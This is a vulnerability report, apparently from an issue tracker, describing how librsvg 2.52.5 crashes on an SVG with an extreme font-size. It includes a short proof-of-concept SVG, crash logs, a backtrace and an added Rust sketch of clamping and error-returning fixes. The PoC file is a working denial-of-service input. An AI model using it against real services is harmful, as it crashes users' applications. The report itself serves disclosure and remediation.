Panic when using a too-big font-size
Hi, I am reporting a vulnerability.
Issue Summary
In 2.52.5, the stable version distributed with Ubuntu 22, the process is terminated by a large font size when processing SVG files.
The crash occurs at the assert!(h >= 0.0); in src/text.rs:359. Since the font size is controlled by the input document, and therefore by an attacker, this is a 'reachable assertion'.
The PoC triggers it with a large font-size value in the style of the <g> element of the SVG file.
Any application that uses a vulnerable version of the librsvg package may be affected. I observed that other applications using version 2.52.5 terminated.
It can be reproduced with the rsvg-convert tool built from the librsvg 2.52.5 sources; the Image Viewer also fails to run normally and terminates.
This can lead to a denial of service (DoS).
Example SVG
<?xml version="1.0"?>
<svg width="200" height="300">
<g style="font-size:1e7px;">
<text>A</text>
</g>
</svg>
- The PoC file (poc) is attached.
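The size quoted in the Pango warning below, 2097151.9990234375, is i32::MAX / 1024 (PANGO_SCALE is 1024), i.e. the largest size Pango can hold in its fixed-point units, which is consistent with the 1e7px value having saturated the text backend before any height reaches the assert. Added example, not librsvg code: a Rust sketch of the two defensive checks a renderer can apply, clamping or rejecting the document's font-size up front and turning the assert into a recoverable error (sanitize_font_size, span_height_checked and MeasureError are illustrative names, not librsvg APIs).

```rust
// Added example, not from librsvg: models the checks that keep a hostile
// font-size from reaching a process-aborting assert. Names are illustrative.

/// PANGO_SCALE: Pango stores sizes as i32 in units of 1/1024.
const PANGO_SCALE: f64 = 1024.0;
/// Largest size Pango can represent; equals the 2097151.999... in the warning.
const MAX_PANGO_SIZE: f64 = i32::MAX as f64 / PANGO_SCALE;

/// Error returned to the caller instead of aborting the whole process.
#[derive(Debug, PartialEq)]
pub enum MeasureError {
    /// font-size was not a finite, positive value.
    InvalidFontSize(f64),
    /// Layout produced a height that is negative or NaN.
    InvalidHeight(f64),
}

/// Validate and clamp a font-size taken from the document: non-finite or
/// non-positive values are rejected, oversize values are clamped to what the
/// text backend can represent instead of being forwarded unchanged.
pub fn sanitize_font_size(px: f64) -> Result<f64, MeasureError> {
    if !px.is_finite() || px <= 0.0 {
        return Err(MeasureError::InvalidFontSize(px));
    }
    Ok(px.min(MAX_PANGO_SIZE))
}

/// Before: the pattern from the report. Any bad height kills the process.
pub fn span_height_panicking(h: f64) -> f64 {
    assert!(h >= 0.0);
    h
}

/// After: the same condition as a recoverable error. `h >= 0.0` is also
/// false for NaN, so one comparison covers both failure modes.
pub fn span_height_checked(h: f64) -> Result<f64, MeasureError> {
    if h >= 0.0 {
        Ok(h)
    } else {
        Err(MeasureError::InvalidHeight(h))
    }
}

fn main() {
    // Constructed inputs: the PoC's 1e7px, a normal size, and two junk values.
    for px in [1e7_f64, 16.0, f64::NAN, -1.0] {
        println!("{}px -> {:?}", px, sanitize_font_size(px));
    }
    println!("height -3.0 -> {:?}", span_height_checked(-3.0));
}
```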
Librsvg Version
- librsvg 2.52.5
$ ./rsvg-convert -v
rsvg-convert version 2.52.5
$ apt search librsvg2
Sorting... Done
Full Text Search... Done
librsvg2-2/jammy,now 2.52.5+dfsg-3 amd64 [installed,automatic]
SAX-based renderer library for SVG files (runtime)
librsvg2-common/jammy,now 2.52.5+dfsg-3 amd64 [installed,automatic]
SAX-based renderer library for SVG files (extra runtime)
librsvg2-dev/jammy,now 2.52.5+dfsg-3 amd64 [installed]
SAX-based renderer library for SVG files (development)
- The rsvg-convert tool was built from the 2.52.5 source on GitLab.
Platform
- Tested on Ubuntu 22
Additional logs
- normal execution
$ ./rsvg-convert poc
(process:3460): Pango-WARNING **: 01:06:26.068: failed to create cairo scaled font, expect ugly output. the offending font is 'Liberation Serif 2097151.9990234375'
(process:3460): Pango-WARNING **: 01:06:26.068: font_face status is: error occurred in libfreetype
(process:3460): Pango-WARNING **: 01:06:26.068: scaled_font status is: error occurred in libfreetype
thread 'main' panicked at 'assertion failed: h >= 0.0', src/text.rs:359:9
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
- with RUST_BACKTRACE=1
$ RUST_BACKTRACE=1 ./rsvg-convert poc
(process:2559): Pango-WARNING **: 06:46:24.377: failed to create cairo scaled font, expect ugly output. the offending font is 'Liberation Serif 2097151.9990234375'
(process:2559): Pango-WARNING **: 06:46:24.378: font_face status is: error occurred in libfreetype
(process:2559): Pango-WARNING **: 06:46:24.378: scaled_font status is: error occurred in libfreetype
thread 'main' panicked at 'assertion failed: h >= 0.0', src/text.rs:359:9
stack backtrace:
0: rust_begin_unwind
at /rustc/001a77fac33f6560ff361ff38f661ff5f1c6bf85/library/std/src/panicking.rs:575:5
1: core::panicking::panic_fmt
at /rustc/001a77fac33f6560ff361ff38f661ff5f1c6bf85/library/core/src/panicking.rs:64:14
2: core::panicking::panic
at /rustc/001a77fac33f6560ff361ff38f661ff5f1c6bf85/library/core/src/panicking.rs:114:5
3: librsvg::text::MeasuredSpan::from_span
at ./src/text.rs:359:9
4: librsvg::text::MeasuredChunk::from_chunk::{{closure}}
at ./src/text.rs:141:25
5: core::iter::adapters::map::map_fold::{{closure}}
at /rustc/001a77fac33f6560ff361ff38f661ff5f1c6bf85/library/core/src/iter/adapters/map.rs:84:28
6: core::iter::traits::iterator::Iterator::fold
at /rustc/001a77fac33f6560ff361ff38f661ff5f1c6bf85/library/core/src/iter/traits/iterator.rs:2438:21
7: <core::iter::adapters::map::Map<I,F> as core::iter::traits::iterator::Iterator>::fold
at /rustc/001a77fac33f6560ff361ff38f661ff5f1c6bf85/library/core/src/iter/adapters/map.rs:124:9
8: core::iter::traits::iterator::Iterator::for_each
at /rustc/001a77fac33f6560ff361ff38f661ff5f1c6bf85/library/core/src/iter/traits/iterator.rs:837:9
9: alloc::vec::Vec<T,A>::extend_trusted
at /rustc/001a77fac33f6560ff361ff38f661ff5f1c6bf85/library/alloc/src/vec/mod.rs:2856:17
10: <alloc::vec::Vec<T,A> as alloc::vec::spec_extend::SpecExtend<T,I>>::spec_extend
at /rustc/001a77fac33f6560ff361ff38f661ff5f1c6bf85/library/alloc/src/vec/spec_extend.rs:26:9
11: <alloc::vec::Vec<T> as alloc::vec::spec_from_iter_nested::SpecFromIterNested<T,I>>::from_iter
at /rustc/001a77fac33f6560ff361ff38f661ff5f1c6bf85/library/alloc/src/vec/spec_from_iter_nested.rs:62:9
12: <alloc::vec::Vec<T> as alloc::vec::spec_from_iter::SpecFromIter<T,I>>::from_iter
at /rustc/001a77fac33f6560ff361ff38f661ff5f1c6bf85/library/alloc/src/vec/spec_from_iter.rs:33:9
13: <alloc::vec::Vec<T> as core::iter::traits::collect::FromIterator<T>>::from_iter
at /rustc/001a77fac33f6560ff361ff38f661ff5f1c6bf85/library/alloc/src/vec/mod.rs:2724:9
14: core::iter::traits::iterator::Iterator::collect
at /rustc/001a77fac33f6560ff361ff38f661ff5f1c6bf85/library/core/src/iter/traits/iterator.rs:1860:9
15: librsvg::text::MeasuredChunk::from_chunk
at ./src/text.rs:138:53
16: <librsvg::text::Text as librsvg::element::Draw>::draw::{{closure}}
at ./src/text.rs:774:42
17: librsvg::drawing_ctx::DrawingCtx::with_discrete_layer::{{closure}}
at ./src/drawing_ctx.rs:900:21
18: librsvg::drawing_ctx::with_saved_cr
at ./src/drawing_ctx.rs:264:11
19: librsvg::drawing_ctx::DrawingCtx::with_discrete_layer
at ./src/drawing_ctx.rs:701:13
20: <librsvg::text::Text as librsvg::element::Draw>::draw
at ./src/text.rs:753:9
21: <librsvg::element::ElementInner<T> as librsvg::element::Draw>::draw
at ./src/element.rs:279:17
22: <librsvg::element::Element as librsvg::element::Draw>::draw
at ./src/element.rs:585:9
23: <rctree::Node<librsvg::node::NodeData> as librsvg::node::NodeDraw>::draw
at ./src/node.rs:316:41
24: librsvg::drawing_ctx::DrawingCtx::draw_node_from_stack
at ./src/drawing_ctx.rs:1600:13
25: <rctree::Node<librsvg::node::NodeData> as librsvg::node::NodeDraw>::draw_children
at ./src/node.rs:331:30
26: <librsvg::structure::Group as librsvg::element::Draw>::draw::{{closure}}
at ./src/structure.rs:46:39
27: librsvg::drawing_ctx::DrawingCtx::with_discrete_layer::{{closure}}
at ./src/drawing_ctx.rs:900:21
28: librsvg::drawing_ctx::with_saved_cr
at ./src/drawing_ctx.rs:264:11
29: librsvg::drawing_ctx::DrawingCtx::with_discrete_layer
at ./src/drawing_ctx.rs:701:13
30: <librsvg::structure::Group as librsvg::element::Draw>::draw
at ./src/structure.rs:40:9
31: <librsvg::element::ElementInner<T> as librsvg::element::Draw>::draw
at ./src/element.rs:279:17
32: <librsvg::element::Element as librsvg::element::Draw>::draw
at ./src/element.rs:585:9
33: <rctree::Node<librsvg::node::NodeData> as librsvg::node::NodeDraw>::draw
at ./src/node.rs:316:41
34: librsvg::drawing_ctx::DrawingCtx::draw_node_from_stack
at ./src/drawing_ctx.rs:1600:13
35: <rctree::Node<librsvg::node::NodeData> as librsvg::node::NodeDraw>::draw_children
at ./src/node.rs:331:30
36: <librsvg::structure::Svg as librsvg::element::Draw>::draw::{{closure}}
at ./src/structure.rs:281:17
37: librsvg::drawing_ctx::DrawingCtx::with_discrete_layer::{{closure}}
at ./src/drawing_ctx.rs:900:21
38: librsvg::drawing_ctx::with_saved_cr
at ./src/drawing_ctx.rs:264:11
39: librsvg::drawing_ctx::DrawingCtx::with_discrete_layer
at ./src/drawing_ctx.rs:701:13
40: <librsvg::structure::Svg as librsvg::element::Draw>::draw
at ./src/structure.rs:273:9
41: <librsvg::element::ElementInner<T> as librsvg::element::Draw>::draw
at ./src/element.rs:279:17
42: <librsvg::element::Element as librsvg::element::Draw>::draw
at ./src/element.rs:585:9
43: <rctree::Node<librsvg::node::NodeData> as librsvg::node::NodeDraw>::draw
at ./src/node.rs:316:41
44: librsvg::drawing_ctx::DrawingCtx::draw_node_from_stack
at ./src/drawing_ctx.rs:1600:13
45: librsvg::drawing_ctx::draw_tree
at ./src/drawing_ctx.rs:252:24
46: librsvg::handle::Handle::render_layer::{{closure}}
at ./src/handle.rs:250:13
47: librsvg::drawing_ctx::with_saved_cr
at ./src/drawing_ctx.rs:264:11
48: librsvg::handle::Handle::render_layer
at ./src/handle.rs:249:9
49: librsvg::handle::Handle::render_document
at ./src/handle.rs:230:9
50: librsvg::api::CairoRenderer::render_document
at ./src/api.rs:398:9
51: rsvg_convert::Surface::render
at ./src/bin/rsvg-convert.rs:314:21
52: rsvg_convert::Converter::convert
at ./src/bin/rsvg-convert.rs:650:13
53: rsvg_convert::main::{{closure}}
at ./src/bin/rsvg-convert.rs:1132:55
54: core::result::Result<T,E>::and_then
at /rustc/001a77fac33f6560ff361ff38f661ff5f1c6bf85/library/core/src/result.rs:1371:22
55: rsvg_convert::main
at ./src/bin/rsvg-convert.rs:1132:21
56: core::ops::function::FnOnce::call_once
at /rustc/001a77fac33f6560ff361ff38f661ff5f1c6bf85/library/core/src/ops/function.rs:250:5
note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.
Edited by thKim0